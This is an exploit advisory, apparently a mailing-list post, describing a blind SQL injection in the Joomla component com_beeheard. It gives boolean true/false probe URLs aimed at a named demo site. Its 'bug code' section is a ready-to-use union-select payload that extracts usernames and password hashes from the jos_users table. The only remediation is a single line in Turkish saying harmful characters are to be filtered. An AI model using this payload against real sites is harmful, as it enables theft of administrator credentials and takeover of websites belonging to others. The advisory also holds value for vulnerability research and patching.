<------------------- header data start ------------------- > [++] Joomla Component com_beeheard Blind SQL injection Vulnerability [++] author : FL0RiX [++] Name : com_beeheard [++] Bug Type : (Blind) SQL Injection [++] Infection : Admin login bilgileri alınabilir. [++] Demo Vuln. : TRUE(+) » http://beeheard.cmstactics.com/index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=2 and 1=1 FALSE(-) » http://beeheard.cmstactics.com/index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=2 and 1=0 [++] Bug Fix Advice : Zararlı karakterler filtrelenmelidir. < ------------------- header data end of ------------------- > < -- bug code start -- > path/index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=null/**/and/**/1=0/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixforever,5,6,7,8,9/**/from/**/jos_users-- < -- bug code end of -- > _________________________________________________________________ Windows Live: Arkadaşlarınız size e-posta gönderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi görürler. http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010